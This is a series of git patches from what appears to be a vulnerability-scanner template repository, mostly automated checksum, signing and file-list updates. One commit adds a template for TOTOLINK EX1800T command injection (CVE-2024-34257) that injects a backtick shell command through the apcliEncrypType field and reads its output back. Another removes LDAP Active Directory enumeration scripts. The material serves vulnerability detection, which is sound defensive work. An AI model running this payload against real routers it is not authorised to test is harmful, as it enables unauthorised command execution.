4b0a004830460221008ab8f2e652ad18b64e4aeb609d6a079714c753d19ffef9b13404bfdb20b85591022100ba89e068e5b2b07aa3da6ef03f22961e59942f8f728f9d94a267424c03f5f844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From aa943497edd8ef75531c8492460bbc15e24f2105 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 17:48:37 +0530 Subject: [PATCH 0916/1841] Update and rename jinhe-oa-c6-lfi.yaml to jinhe-oa-c6-upload-lfi.yaml --- .../jinhe-oa-c6-lfi.yaml => jinhe/jinhe-oa-c6-upload-lfi.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/vulnerabilities/{other/jinhe-oa-c6-lfi.yaml => jinhe/jinhe-oa-c6-upload-lfi.yaml} (97%) diff --git a/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml b/http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml similarity index 97% rename from http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml rename to http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml index 18de7b94f2..882b1dc4de 100644 --- a/http/vulnerabilities/other/jinhe-oa-c6-lfi.yaml +++ b/http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml @@ -1,4 +1,4 @@ -id: jinhe-oa-c6-lfi +id: jinhe-oa-c6-upload-lfi info: name: Jinhe OA_C6_UploadFileDownLoadnew - Arbitrary File Read From 4977fefe02a4eaa67dd34fd76485cdd27dfab908 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 12:20:29 +0000 Subject: [PATCH 0917/1841] Auto Generated New Template Addition List [Thu Jul 4 12:20:28 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index eda0d2b10a..209e4c7b6b 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-27292.yaml http/cves/2024/CVE-2024-29972.yaml http/cves/2024/CVE-2024-32709.yaml +http/cves/2024/CVE-2024-33113.yaml http/cves/2024/CVE-2024-33605.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-36401.yaml From fa81b8940a02ca8884192ded375ee6289680a5db Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 17:51:14 +0530 Subject: [PATCH 0918/1841] Create CVE-2024-34257.yaml --- http/cves/2024/CVE-2024-34257.yaml | 53 ++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2024/CVE-2024-34257.yaml diff --git a/http/cves/2024/CVE-2024-34257.yaml b/http/cves/2024/CVE-2024-34257.yaml new file mode 100644 index 0000000000..fdccdff669 --- /dev/null +++ b/http/cves/2024/CVE-2024-34257.yaml @@ -0,0 +1,53 @@ +id: CVE-2024-34257 + +info: + name: TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection + author: pussycat0x + severity: high + description: | + TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges. + reference: + - https://example.com/reference + - https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md + - https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350 + - https://github.com/fkie-cad/nvd-json-data-feeds + metadata: + fofa-query: title="totolink" + tags: cve,cve2024,rce,unauth + +variables: + file: "{{rand_base(6)}}" + +http: + - raw: + - | + POST /cgi-bin/cstecgi.cgi HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/page/index.html?timestamp=1714114057910 + + { + "token":"", + "apcliEncrypType":"`id>../{{file}}.txt`", + "topicurl":"setWiFiExtenderConfig" + } + - | + GET /{{file}}.txt HTTP/1.1 + Host: {{Hostname}} + + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '"success": true' + + - type: regex + part: body_2 + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + + - type: status + status: + - 200 From 2bc1fa593ac551ac6a898033f89b71c968ea7775 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 12:21:20 +0000 Subject: [PATCH 0919/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4adacd5b71..9202900217 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -13,6 +13,7 @@ on: - 'http/cves/2024/CVE-2024-27292.yaml' - 'http/cves/2024/CVE-2024-29972.yaml' - 'http/cves/2024/CVE-2024-32709.yaml' + - 'http/cves/2024/CVE-2024-33113.yaml' - 'http/cves/2024/CVE-2024-33605.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-36401.yaml' From b37e14a390e335b8b0f71ca31e44c3212d733000 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 12:21:29 +0000 Subject: [PATCH 0920/1841] Auto Generated Templates Checksum [Thu Jul 4 12:21:29 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dbe2273f3b..89bf195a1f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3449,6 +3449,7 @@ http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c http/cves/2024/CVE-2024-32709.yaml:8d0c8b5a8814e6437e9c2473dd6ac3af22f8333e http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 http/cves/2024/CVE-2024-3274.yaml:b56159631d06052a408c3897ef043b866ce0514c +http/cves/2024/CVE-2024-33113.yaml:eaf7e6cc5dc7f79a6bf289ee2a6af84bef81bca1 http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33605.yaml:073678cce93693a49cdbf61160717cff11e51f54 @@ -3631,7 +3632,7 @@ http/default-logins/riello/netman-default-login.yaml:ac5150c7d6dfa9fec6fc1b585ba http/default-logins/rockmongo/rockmongo-default-login.yaml:8772a7f8d293629854953490e97aaccd74ca394e http/default-logins/rseenet/rseenet-default-login.yaml:239c2ec95822a7b21fa4bd9bf9a4a6a640a6d531 http/default-logins/ruckus/ruckus-wireless-default-login.yaml:f6eed5ce468a58c00c2ed828fd4b4c54ed4711eb -http/default-logins/ruijie/ruijie-nbr-default-login.yaml:3a2fc208dadb91ea00eb932f407787ba1971ccb3 +http/default-logins/ruijie/ruijie-nbr-default-login.yaml:3245ddc1b5eac540f24c80c925a9c095ac9604ed http/default-logins/samsung/samsung-printer-default-login.yaml:04c2f1031b247cfe6f3ee76e2ca5ff21e1629e21 http/default-logins/samsung/samsung-wlan-default-login.yaml:c0981f37d035a88bd4138a86329f463f751bf239 http/default-logins/seeddms/seeddms-default-login.yaml:9b9d566def0bfca23f1880f29e07be5865b21a02 @@ -8836,7 +8837,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ad16a2cf4c7479f4fd5cca2161de6955c19a640f +templates-checksum.txt:dfa5f252059d6845b4af32ee212a850a4e491a4e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6a3144602660de03e2197218cf0c7e7ebcc647d6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 12:22:25 +0000 Subject: [PATCH 0921/1841] Auto Template Signing [Thu Jul 4 12:22:25 UTC 2024] :robot: --- http/cves/2024/CVE-2024-33113.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-33113.yaml b/http/cves/2024/CVE-2024-33113.yaml index 1546647ad3..1b76a9b005 100644 --- a/http/cves/2024/CVE-2024-33113.yaml +++ b/http/cves/2024/CVE-2024-33113.yaml @@ -35,3 +35,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100ec87c2ac5ca4f20e03f4124ceff0813f7c2781c40386a2e175833a94317fecfc0221008e60c37e890f1d57fc8e3ecaf060276b1800e9eefe727ed8c6713f027166613d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cee46b0988101d5e9d01445f30c98e32d9c468ad Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 12:23:08 +0000 Subject: [PATCH 0922/1841] Auto Generated New Template Addition List [Thu Jul 4 12:23:08 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 209e4c7b6b..7e5864fc59 100644 --- a/.new-additions +++ b/.new-additions @@ -41,6 +41,7 @@ http/technologies/apache/apache-pinot-detect.yaml http/technologies/neo4j-neodash-detect.yaml http/technologies/wordpress/plugins/chaty.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml +http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml http/vulnerabilities/next-js-cache-poisoning.yaml http/vulnerabilities/other/azon-dominator-sqli.yaml http/vulnerabilities/other/bagisto-csti.yaml From 4b47395f7be168c82e948bb7a154e8f018164d9f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 12:23:55 +0000 Subject: [PATCH 0923/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9202900217..f53c375730 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -46,6 +46,7 @@ on: - 'http/technologies/neo4j-neodash-detect.yaml' - 'http/technologies/wordpress/plugins/chaty.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' + - 'http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' - 'http/vulnerabilities/other/azon-dominator-sqli.yaml' - 'http/vulnerabilities/other/bagisto-csti.yaml' From be3ba58adb59db09b035cac73443bea3f8d163b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 12:24:45 +0000 Subject: [PATCH 0924/1841] Auto Generated Templates Checksum [Thu Jul 4 12:24:45 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 89bf195a1f..6c69a22fb3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3449,7 +3449,7 @@ http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c http/cves/2024/CVE-2024-32709.yaml:8d0c8b5a8814e6437e9c2473dd6ac3af22f8333e http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 http/cves/2024/CVE-2024-3274.yaml:b56159631d06052a408c3897ef043b866ce0514c -http/cves/2024/CVE-2024-33113.yaml:eaf7e6cc5dc7f79a6bf289ee2a6af84bef81bca1 +http/cves/2024/CVE-2024-33113.yaml:f4141a2a8bfa7dfe11f27cd2a19531a90de59223 http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33605.yaml:073678cce93693a49cdbf61160717cff11e51f54 @@ -7853,6 +7853,7 @@ http/vulnerabilities/jenkins/jenkins-stack-trace.yaml:7ebe9434bb86753e39e131e4e6 http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:3f864ee1d304a4ea47e603be73b0b193d3764a28 http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml:5864d5ddbf7bb775957f9af2c354e278b135e888 http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml:ddb4e69fa2143bf694f57a117f26e02f9a0b3db5 +http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml:86ccd76d2626d750edd0d2cf6c69e529ee060917 http/vulnerabilities/jira/jira-servicedesk-signup.yaml:d3ad2f1c3e763757dfc43f44463017a99f5afed4 http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml:b82ea1a2c8c93438f53c1d8176716d28c54d6249 http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml:ec5a548e21d55f5b4ffe41aa59abf1b795b149fa @@ -8837,7 +8838,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:dfa5f252059d6845b4af32ee212a850a4e491a4e +templates-checksum.txt:c2c4e5ace6de2bf57d53ba79fccf51a5e425f33a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ecabfd698a5c50e24e6752c733135ecffee89685 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 12:24:54 +0000 Subject: [PATCH 0925/1841] Auto Template Signing [Thu Jul 4 12:24:54 UTC 2024] :robot: --- http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml b/http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml index 882b1dc4de..5cb2445cd9 100644 --- a/http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml +++ b/http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml @@ -32,3 +32,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220113a253a49c9efc3ebbebb7f0f7a09f5ba9591d84421330e3237cc10aaf6f542022100ec45d703a8881402fc70b28229eab7688c3b5fa5fc9e36c43b6f97dd7ecb1faf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ba88b043a612db0d5ca60396365d918fe09bdbfc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 12:28:12 +0000 Subject: [PATCH 0927/1841] Auto Generated Templates Checksum [Thu Jul 4 12:28:12 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6c69a22fb3..c7db8dfb66 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2268,7 +2268,7 @@ http/cves/2021/CVE-2021-27520.yaml:05c3fd807ea8b3c7b1d632253b5a368169a91caa http/cves/2021/CVE-2021-27561.yaml:4466d02ccd5225c530894a23f7271a4e52927715 http/cves/2021/CVE-2021-27651.yaml:d4495c5c75916c88ebcfc6963aedcc1ac85c0c68 http/cves/2021/CVE-2021-27670.yaml:890d6f59fb56bee4bbf883103ecb21329a55cc96 -http/cves/2021/CVE-2021-27748.yaml:1dc51db3b3d3be24e2be6387448b7a662531edb5 +http/cves/2021/CVE-2021-27748.yaml:b49b28d50feae1a813c7ab51edf7136aa59532cc http/cves/2021/CVE-2021-27850.yaml:64ecfed4708d7c2dc35acd4db916dbc2eb32ad74 http/cves/2021/CVE-2021-27905.yaml:6d4e98b59983d2c21da912216d49bcd0c88a5cfc http/cves/2021/CVE-2021-27909.yaml:1fadaf13dcd7e7bf8b63822844518fe529f59af2 @@ -7853,7 +7853,7 @@ http/vulnerabilities/jenkins/jenkins-stack-trace.yaml:7ebe9434bb86753e39e131e4e6 http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:3f864ee1d304a4ea47e603be73b0b193d3764a28 http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml:5864d5ddbf7bb775957f9af2c354e278b135e888 http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml:ddb4e69fa2143bf694f57a117f26e02f9a0b3db5 -http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml:86ccd76d2626d750edd0d2cf6c69e529ee060917 +http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml:cbd2abf6521161a7497aae2672481fb4b839cb22 http/vulnerabilities/jira/jira-servicedesk-signup.yaml:d3ad2f1c3e763757dfc43f44463017a99f5afed4 http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml:b82ea1a2c8c93438f53c1d8176716d28c54d6249 http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml:ec5a548e21d55f5b4ffe41aa59abf1b795b149fa @@ -8838,7 +8838,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c2c4e5ace6de2bf57d53ba79fccf51a5e425f33a +templates-checksum.txt:dddd61134ff395bd429e87fe341ec1b7b174566e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 07a8f039652c91f8513cd9eb9dd96f2eac1a91b9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 12:29:55 +0000 Subject: [PATCH 0928/1841] Auto Template Signing [Thu Jul 4 12:29:55 UTC 2024] :robot: --- http/cves/2021/CVE-2021-27748.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml index 8e8e5a9a25..cb7c631a8b 100644 --- a/http/cves/2021/CVE-2021-27748.yaml +++ b/http/cves/2021/CVE-2021-27748.yaml @@ -52,4 +52,4 @@ http: part: body words: - "Interactsh Server" -# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206c32c2de4201bdd15007eb3bf05d67820708447ab1c65ca0c81c782de9453dfb02202a678eb5d692039657fdff391b654c0bd3cb6c409e784102e62b31e77792bc22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3e8179ba562c7a39ead9f69a372aec35d68334e4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 13:26:07 +0000 Subject: [PATCH 0929/1841] Auto Generated New Template Addition List [Thu Jul 4 13:26:07 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7e5864fc59..a213f185b7 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ dast/vulnerabilities/injection/csv-injection.yaml dast/vulnerabilities/injection/xinclude-injection.yaml http/cves/2020/CVE-2020-10189.yaml http/cves/2023/CVE-2023-3380.yaml +http/cves/2023/CVE-2023-35156.yaml http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-27292.yaml From 0051a95de3c7666023add73ba5335c05e8f0fa88 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 13:26:14 +0000 Subject: [PATCH 0930/1841] Auto Generated Templates Checksum [Thu Jul 4 13:26:14 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c7db8dfb66..8ab2263edc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2268,7 +2268,7 @@ http/cves/2021/CVE-2021-27520.yaml:05c3fd807ea8b3c7b1d632253b5a368169a91caa http/cves/2021/CVE-2021-27561.yaml:4466d02ccd5225c530894a23f7271a4e52927715 http/cves/2021/CVE-2021-27651.yaml:d4495c5c75916c88ebcfc6963aedcc1ac85c0c68 http/cves/2021/CVE-2021-27670.yaml:890d6f59fb56bee4bbf883103ecb21329a55cc96 -http/cves/2021/CVE-2021-27748.yaml:b49b28d50feae1a813c7ab51edf7136aa59532cc +http/cves/2021/CVE-2021-27748.yaml:ba10743627d7eb9d261178b04b461b279ffdb1b2 http/cves/2021/CVE-2021-27850.yaml:64ecfed4708d7c2dc35acd4db916dbc2eb32ad74 http/cves/2021/CVE-2021-27905.yaml:6d4e98b59983d2c21da912216d49bcd0c88a5cfc http/cves/2021/CVE-2021-27909.yaml:1fadaf13dcd7e7bf8b63822844518fe529f59af2 @@ -3183,6 +3183,7 @@ http/cves/2023/CVE-2023-34960.yaml:4e27c9bf1526aee4e168645550f2a85595b7df7a http/cves/2023/CVE-2023-34993.yaml:8b4deeb45e70bb7dca9012a7fceb9e954fe1f867 http/cves/2023/CVE-2023-35078.yaml:4986f8899e309eabfe7de47ac607fc17bc6e2306 http/cves/2023/CVE-2023-35082.yaml:37ad71a404ca250f882e69f45503631e001653a2 +http/cves/2023/CVE-2023-35156.yaml:4c05e9ff833b26629f5811e3ff20714d64a69db4 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 http/cves/2023/CVE-2023-35813.yaml:071b2cdd7e888724f69f9772dafccd2fd315b143 @@ -8838,7 +8839,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:dddd61134ff395bd429e87fe341ec1b7b174566e +templates-checksum.txt:7c06f69b3e8d30079496d1ef542e5d4cf65edae7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 85d9013dff5ca3c64aecf92bd84d417d9875f992 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 13:26:48 +0000 Subject: [PATCH 0931/1841] Auto Generated Templates Checksum [Thu Jul 4 13:26:48 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8ab2263edc..9576d25e08 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3185,6 +3185,7 @@ http/cves/2023/CVE-2023-35078.yaml:4986f8899e309eabfe7de47ac607fc17bc6e2306 http/cves/2023/CVE-2023-35082.yaml:37ad71a404ca250f882e69f45503631e001653a2 http/cves/2023/CVE-2023-35156.yaml:4c05e9ff833b26629f5811e3ff20714d64a69db4 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f +http/cves/2023/CVE-2023-35160.yaml:617c0e5dc36eebc71db8c30fa818ae0aebe662bd http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 http/cves/2023/CVE-2023-35813.yaml:071b2cdd7e888724f69f9772dafccd2fd315b143 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 @@ -8839,7 +8840,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7c06f69b3e8d30079496d1ef542e5d4cf65edae7 +templates-checksum.txt:bc82696bc2460252050b4d18e9b4ed46e544d041 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e86b38664f69ea19c4bd8a1d99192461935a839c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 4 Jul 2024 13:27:01 +0000 Subject: [PATCH 0932/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f53c375730..0098b74e8f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'dast/vulnerabilities/injection/xinclude-injection.yaml' - 'http/cves/2020/CVE-2020-10189.yaml' - 'http/cves/2023/CVE-2023-3380.yaml' + - 'http/cves/2023/CVE-2023-35156.yaml' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-27292.yaml' From 562e56d74cebdbc08349fec3a05b199f8c81a8a5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 13:27:59 +0000 Subject: [PATCH 0933/1841] Auto Template Signing [Thu Jul 4 13:27:59 UTC 2024] :robot: --- http/cves/2023/CVE-2023-35156.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-35156.yaml b/http/cves/2023/CVE-2023-35156.yaml index 30cfd45f94..b32246c6f6 100644 --- a/http/cves/2023/CVE-2023-35156.yaml +++ b/http/cves/2023/CVE-2023-35156.yaml @@ -52,3 +52,4 @@ http: status: - 200 - 401 +# digest: 4a0a004730450220731174791ebb3c8d2b5bb67d9220d3471fdc81d65c3694cc57368c0d4f864f9a022100f50ace80529d0d7010f9abf1de8592756e345b3141c94d52d1ab4f5dde3c7c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 49f0f2ba8f21d65a48d3a3076dd4d5dcdf56fa6a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 19:09:04 +0530 Subject: [PATCH 0934/1841] Deleted --- .../enumeration/ldap/ldap-get-ad-grp.yaml | 47 ------------------- .../enumeration/ldap/ldap-get-ad-users.yaml | 46 ------------------ 2 files changed, 93 deletions(-) delete mode 100644 javascript/enumeration/ldap/ldap-get-ad-grp.yaml delete mode 100644 javascript/enumeration/ldap/ldap-get-ad-users.yaml diff --git a/javascript/enumeration/ldap/ldap-get-ad-grp.yaml b/javascript/enumeration/ldap/ldap-get-ad-grp.yaml deleted file mode 100644 index 89655a26ce..0000000000 --- a/javascript/enumeration/ldap/ldap-get-ad-grp.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: ldap-get-ad-grp - -info: - name: LDAP Get Active Directory Group - Enumeration - author: pussycat0x - severity: info - description: | - Attempts to list the supported capabilities in a SMBv2 server for each enabled dialect. - reference: - - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ldap.Client#getadgroups - metadata: - max-request: 1 - shodan-query: ldap - tags: js,network,ldap,enum - -javascript: - - code: | - const ldap = require('nuclei/ldap'); - const cfg = new ldap.Config(); - cfg.Upgrade = true; - const client = new ldap.Client(Host, Port, cfg); - const groups = client.GetADGroups(); - const bytes = require('nuclei/bytes'); - const buffer = new bytes.Buffer(); - for (const group of groups) { - buffer.WriteString("DistinguishedName: '" + group.DistinguishedName+ "' ,"); - buffer.WriteString("SAMAccountName: '" + group.SAMAccountName+ "' ,"); - buffer.WriteString("PWDLastSet: '" + group.PWDLastSet+ "' ,"); - buffer.WriteString("LastLogon: '" + group.LastLogon+ "' ,"); - buffer.WriteString("MemberOf: '" + group.MemberOf+ "' ,"); - buffer.WriteString("ServicePrincipalName: '" + group.ServicePrincipalName+ "' ,"); - } - Export(buffer.String()); - - args: - Host: "ldap://{{Host}}" - Port: 389 - - matchers: - - type: dsl - dsl: - - "success == true" - - extractors: - - type: dsl - dsl: - - response \ No newline at end of file diff --git a/javascript/enumeration/ldap/ldap-get-ad-users.yaml b/javascript/enumeration/ldap/ldap-get-ad-users.yaml deleted file mode 100644 index 